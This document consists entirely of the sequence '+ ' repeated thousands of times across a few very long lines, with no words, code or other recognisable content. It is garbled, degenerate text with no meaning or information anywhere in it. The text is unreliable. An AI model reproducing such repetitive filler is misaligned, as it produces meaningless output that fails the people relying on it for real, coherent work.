+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 